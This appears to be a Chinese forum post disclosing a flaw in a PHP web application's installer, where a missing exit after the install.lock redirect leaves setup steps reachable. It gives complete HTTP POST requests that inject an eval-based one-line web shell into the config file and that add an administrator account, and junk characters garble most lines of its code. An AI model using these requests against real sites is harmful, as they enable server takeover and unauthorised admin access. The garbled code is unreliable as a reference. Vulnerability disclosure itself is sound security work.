问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。
$ |9 w! E* a% |( W
2 ?/ [' m$ y9 B9 Y% B- R4 z<?php
9 X: I, g. [! ~+ R* Hif(file_exists("../install.lock"))( ?, @- W/ K- C2 ~) ~
{
. {9 w9 E: U4 z5 W2 C header("Location: ../");//没有退出7 W4 k$ C& @. s1 Q! m7 ~3 s
}
( u# C' L# {, |6 R0 }8 l% V 9 T1 h3 q4 d/ a9 E j- N
//echo 'tst';exit;0 W& O" m o/ I. P
require_once("init.php");
9 E; g* k* h3 |" T/ K# Xif(empty($_REQUEST['step']) || $_REQUEST['step']==1): z' C1 a# l- G4 _2 Z4 e }
{3 p- q( y$ q, N- l9 V# M
可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
) L5 n7 H4 V6 | Y' e7 O' ~( |+ u3 n/ I& a# ~0 Q8 R8 O% m
1、getshell(很危险)3 S& w- r- O& k& ]* [4 L! Q: b
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
3 E# s- t3 r z; I7 M J{( X3 z5 `1 P) w$ a9 M0 \
$smarty->assign("step",1);- t% l) f! C! @# `9 ]! l% o+ A
$smarty->display("index.html");
7 j. H) R. W3 v% B }}elseif($_REQUEST['step']==2)3 `. @& L4 Q0 \
{" {# ~% q- ?5 \2 D
$mysql_host=trim($_POST['mysql_host']);
6 q4 h5 ]3 t3 z, Z& o $mysql_user=trim($_POST['mysql_user']);% _2 g0 Q, F9 X( {
$mysql_pwd=trim($_POST['mysql_pwd']);$ t/ j8 i; F/ G' s
$mysql_db=trim($_POST['mysql_db']);" e1 s) ~& A' m% ?0 y
$tblpre=trim($_POST['tblpre']);
, d$ A" ^* \7 \6 S $domain==trim($_POST['domain']);
: A0 f5 G* N" Z# v/ X+ B $str="<?php \r\n";% i, W- k: l b, ~( |; B% T+ ]
$str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";, e5 {, A& ], H# h0 {, \
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";! r9 c9 R, U& b7 W; c3 `+ V
$str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";$ Q4 \2 T8 v T0 F, B
$str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";; M: z/ s6 }0 I
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";
0 p! X6 a% @# D) |1 [9 w0 r $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n"; F) j3 J$ z3 M2 e. g" w6 q
$str.='define("DOMAIN","'.$domain.'");'."\r\n";
5 \6 w0 m' k) U $str.='define("SKINS","default");'."\r\n";3 e" ]6 ]1 M' u
$str.='?>';
, E. t% I6 Y9 q6 i; U1 y# N file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
: I9 M: }" u1 W1 h' M上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马
% ^2 F+ D D4 W; S1 k% BPOST /canting/install/index.php?m=index&step=2 HTTP/1.1
, j3 n+ F6 V) L+ D$ {, R: D6 c: F' E- |Host: 192.168.80.1293 r8 }7 c+ y9 m' V' Q G* p0 S
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
/ S! H4 L1 A. UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8% Z z1 c2 o! m- o S" J
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
4 x M) x3 D! U7 P- CAccept-Encoding: gzip, deflate
1 w# u) G+ }: vReferer: http://192.168.80.129/canting/install/index.php?step=1
1 u5 i4 D3 h7 v' ?* x( a! qCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
/ ~( [( l( J' H: y% S+ {: Y. mContent-Type: application/x-www-form-urlencoded% `* F, J8 A9 X1 _& L1 k+ [) z
Content-Length: 126: J/ Z; ^ N6 b b
7 b$ p* w- t" | F' O! z
mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
/ V; v% c/ v/ k. F A. W# q% v# F但是这个方法很危险,将导致网站无法运行。
. I: b* [1 d4 r" _' }& ~$ {4 O3 A6 a* p \
2、直接添加管理员
0 B9 G' C2 D" Z/ _* m+ q* _- S" b0 |* V. u J, ]
elseif($_REQUEST['step']==5)
4 q6 Y' n: a# \- T* n! {' r% m, X{
5 N$ b! O5 T+ Y) M( L* v/ n if($_POST)4 M2 E; p+ e: O, W; v1 L& B6 V, k# h3 c
{ require_once("../config/config.inc.php");
6 w4 Y: \/ o# c $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);, }9 L- I# a5 g' U% _, ^
mysql_select_db(MYSQL_DB,$link);7 H, r# P8 s1 I) l
mysql_query("SET NAMES ".MYSQL_CHARSET );
* j) l4 a. s! X5 ?" h) t8 @ mysql_query("SET sql_mode=''");
- S: T- j1 Z, h4 T% Y. f5 R) C$ h' F+ e! r* W) u
$adminname=trim($_POST['adminname']);3 i% |7 x2 h1 X/ s
$pwd1=trim($_POST['pwd1']);7 Q3 P" i0 ?1 y- g& T! j; K
$pwd2=trim($_POST['pwd2']);
6 E8 F" y$ A0 v3 \: ^1 \9 o! w5 c if(empty($adminname))# P3 Z Q6 j0 c
{
4 J8 D2 g! o4 u# t8 s3 J1 g t# Z: Z) ^- P
echo "<script>alert('管理员不能为空');history.go(-1);</script>";
) \) h% b5 P* j. y, b exit();
$ l N% w$ _) ]7 D+ n }
5 v5 A7 i9 q- y# t6 ?, S& k( F0 q if(($pwd1!=$pwd2) or empty($pwd1))
5 r# {& _3 B& k! j- C! Y' E4 q {' V( U; u [7 D3 }7 d
echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出
! B, d% b+ e' D2 Z) T- J }
9 g# F' Y9 z& ?4 f0 l9 p: K; M mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员- Q/ Y4 d( r; e3 ` \
}1 j& Y! Q& [. }
这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:
5 Q) b+ J1 C) k1 N. J; a9 w0 @( s$ XPOST /canting/install/index.php?m=index&step=5 HTTP/1.1
8 z" c2 p8 {: X. W; UHost: 192.168.80.129( Y9 m4 U- a+ o" y$ Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.08 L9 U7 o& Y1 j6 O: z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8% }2 ~$ M2 h0 C: `( o- P; A) X& y; L g
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3( l+ [, x# D; Y1 }. w% Q) y
Accept-Encoding: gzip, deflate
6 j) W8 @' j( j3 jReferer: http://www.2cto.com /canting/install/index.php?step=13 G5 O9 {" {/ e' m) V
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
* k x# x9 N7 ^6 Y) U: W9 gContent-Type: application/x-www-form-urlencoded
) Q: e9 L; V8 `Content-Length: 46
3 W" l/ Y6 K$ e/ Z: O
; ^& Y; `6 N1 [5 Zadminname=qingshen&pwd1=qingshen&pwd2=qingshen
5 C! a$ P0 ]( {1 U& o |
发表于 2012-12-4 11:13:44
收藏
支持
反对